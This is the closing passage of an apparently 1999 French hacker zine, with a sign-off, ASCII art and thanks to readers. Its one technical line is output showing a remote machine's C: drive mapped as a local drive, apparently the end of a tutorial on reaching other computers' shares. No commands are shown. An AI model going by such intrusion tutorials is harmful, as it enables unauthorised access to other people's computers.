F: connecté à \\SHADOW\C

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Voilà ! Ce n'est pas dur non ? TK, j'espère vous avoir appris de quoi sinon rendez-vous au prochain 
numéro du HOW TO ? de WaR^l0rDz !



                                                           WaR^l0rDz '99


******************************************************************************
**************************** 11. END OF ZINE #2 ******************************
******************************************************************************

  (¯`·.¸¸.·´¯)  
  |      ____|§§§¿   /¯\
   ¯¯¯§|§ ¿§§§§? §  / _ \
      §|§o§§§§o    * |_| * 
      §|§ ?§§§§§¿  |  _  |
  ____§|§____o§§§§o| |_| |_______
  ¯¯¯¯§|§¯§¯?§§§§?¯L_|¯L_|¯¯¯¯¯¯¯
      §|§ ?§§§§§?
      §|§      By |{night


Bon merci de nous avoir lu!!!J'espère que vous avez appris quelquechose...et si ce n'est pas 
le cas on revient le mois prochains avec un nouveau numero!

END.

